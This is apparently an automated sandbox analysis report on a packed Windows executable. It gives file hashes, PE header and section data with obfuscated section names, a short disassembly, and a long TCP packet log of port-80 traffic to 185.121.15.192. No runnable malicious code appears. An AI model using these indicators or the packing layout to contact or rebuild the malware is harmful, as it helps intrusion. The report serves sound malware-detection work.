                                                          SHA1:8b05aa4709fd09892238baa7a14f42d58dd58d14
                                                          SHA256:d01a1b39c935e182b6e4d6c2c15dfe35a59b086fe55bbea0338bc35626a1d3df
                                                          SHA512:e03cfe592504f165fdd3a04dc3293d2ac786c51b9b59f6ebc0560013aadde66bdfdcb3c93cd225b51cdff831050e1bfc94977ed761006f10a852fe132a6cebb8
                                                          SSDEEP:98304:S5OvmjO1EX69Kl29THDuBr/v20z3TpSYYfRvCFwt:zvmj8EKwAENz3VSRvJ
                                                          TLSH:FC26339D0E22FBEFD16571FFE01BD237BD2625034936BDB88AC5F940903192536D9A18
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.VH...v..2...........pH...@..................................iE...@... ............................
                                                          Icon Hash:00928e8e8686b000
                                                          Entrypoint:0x109a000
                                                          Entrypoint Section:.taggant
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                          DLL Characteristics:DYNAMIC_BASE
                                                          Time Stamp:0x67639809 [Thu Dec 19 03:50:33 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                          Instruction
                                                          jmp 00007FFA6881E38Ah
                                                          cmovle eax, dword ptr [eax+eax+00h]
                                                          add byte ptr [eax], al
                                                          add cl, ch
                                                          add byte ptr [eax], ah
                                                          add byte ptr [eax], al
                                                          add byte ptr [edx+ecx], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          pushad
                                                          int1
                                                          jns 00007FFA6881E390h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x74705f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x746000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc984f4 | 0x10 | euhadjik
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc984a4 | 0x18 | euhadjik
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
| 0x1000 | 0x745000 | 0x284c00 | ab20037ed4c06e6a5dfce2cf52b684b4 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x746000 | 0x1ac | 0x200 | 703fa0fc62b76c1528bd2db5433dd288 | False | 0.580078125 | data | 4.565637092039164 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x747000 | 0x1000 | 0x200 | e84636d45557e74dadd0f14f36394655 | False | 0.166015625 | data | 1.1471680400846989 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
| 0x748000 | 0x392000 | 0x200 | d6a50396edd4b478e43bec3120943adf | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
euhadjik | 0xada000 | 0x1bf000 | 0x1be800 | 80c75be31d3c16d3fe87d3ab3205f4c4 | False | 0.9942390467525196 | data | 7.954343878891304 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
fyvcfwgt | 0xc99000 | 0x1000 | 0x400 | 5c2be1908f31720301fe9eaf0f64935e | False | 0.81640625 | data | 6.3367478979169745 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xc9a000 | 0x3000 | 0x2200 | 3d765eda03db0ea559e79522262f405b | False | 0.058363970588235295 | DOS executable (COM) | 0.7002217992563645 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Resources

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc98504 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
Imports

DLL | Import
kernel32.dll | lstrcpy
TCP packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                          Dec 20, 2024 16:44:46.086410999 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.086421013 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.086431026 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.086440086 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.086448908 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.086457014 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.086467981 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.086477995 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.086487055 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.142021894 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.142246008 CET8049726185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.368596077 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:46.488409042 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.490206957 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:46.490637064 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:46.611828089 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.611849070 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.611917019 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:46.611963987 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:46.611973047 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.612021923 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:46.612210035 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.612323046 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:46.612329006 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.612339973 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.612395048 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:46.613637924 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.613687992 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:46.613786936 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.613796949 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.613845110 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:46.615102053 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.615166903 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:46.731760979 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.731786013 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.731834888 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.731858969 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:46.731914997 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:46.731973886 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.731983900 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.732007027 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.732033968 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:46.732053041 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:46.773750067 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.773993969 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:46.895343065 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.895473003 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:46.933846951 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:46.934000969 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.053617954 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.053710938 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.229897022 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.229964018 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.466099024 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.466202974 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.478147984 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.478375912 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.478449106 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.585865021 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.585938931 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.598709106 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.598731041 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.598742962 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.598752975 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.598773956 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.598814964 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.598829031 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.598886967 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.598927021 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.599039078 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.599050045 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.599061012 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.599071980 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.599085093 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.599086046 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.599117041 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.599134922 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.599185944 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.599204063 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.599215031 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.599225044 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.599250078 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.599261999 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.599330902 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.599340916 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.599350929 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.599359989 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.599385977 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.599509954 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.599534035 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.599544048 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.599554062 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.599667072 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.599807024 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.599818945 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.599829912 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.599957943 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.600109100 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.600119114 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.600259066 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.600269079 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.600716114 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.600764990 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.600788116 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.600797892 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.705689907 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.718534946 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.718626976 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.718636990 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.718658924 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.718851089 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.718930960 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.718995094 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.719027996 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.719082117 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.719136000 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.719244957 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.719254971 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.719259024 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.719497919 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.719507933 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.719516993 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.719527006 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.719945908 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.720398903 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.720474958 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.720515966 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.720525980 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.720542908 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.720576048 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.720596075 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.720746994 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.720797062 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.720851898 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.720928907 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.720941067 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.721064091 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.721103907 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.721159935 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.721297979 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.721307993 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.721312046 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.721337080 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.721395969 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.721491098 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.721537113 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.721577883 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.721586943 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.721750975 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.721760035 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.721770048 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.721779108 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.721787930 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722554922 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722565889 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722575903 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722589970 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722599983 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722609043 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722619057 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722628117 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722636938 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722645998 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722656012 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722665071 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722675085 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722686052 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722696066 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722706079 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722714901 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722724915 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722734928 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722743988 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722752094 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722762108 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722770929 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722781897 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722793102 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722804070 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.722811937 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.723325014 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.723334074 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.723627090 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.723685980 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.769794941 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.769913912 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.770344973 CET4973380192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:47.840290070 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840307951 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840353966 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840379000 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840404987 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840429068 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840455055 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840477943 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840490103 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840502024 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840512991 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840522051 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840537071 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840548038 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840559006 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840568066 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840578079 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840586901 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840595961 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840606928 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840626955 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840637922 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840651035 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840698004 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840806961 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840816975 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840833902 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.840842962 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.841069937 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.841080904 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.841089964 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.841101885 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.841114044 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.841124058 CET8049733185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:47.841279984 CET8049733185.121.15.192192.168.2.5
Dec 20, 2024 16:44:47.841296911 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.841308117 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.841317892 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.841326952 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.841336966 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.841346025 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.841357946 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.841428041 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.841439009 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.841443062 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.841447115 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.841451883 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.841578960 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.841594934 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.841600895 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.841612101 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.841620922 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.841631889 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.842015982 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.843179941 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.843317986 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.843328953 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.843442917 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.843452930 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.843462944 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.843475103 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.843631983 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.843771935 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.843782902 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.843868971 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.843879938 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.843889952 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.844125032 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.844170094 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.844307899 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.844317913 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.844460011 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.844502926 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.844806910 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.844815969 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.844938040 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.844949007 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.844995975 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.845005989 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.845017910 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.845036983 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.845046997 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.845197916 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.845207930 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.845212936 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.845216036 CET     80  49733  185.121.15.192   192.168.2.5
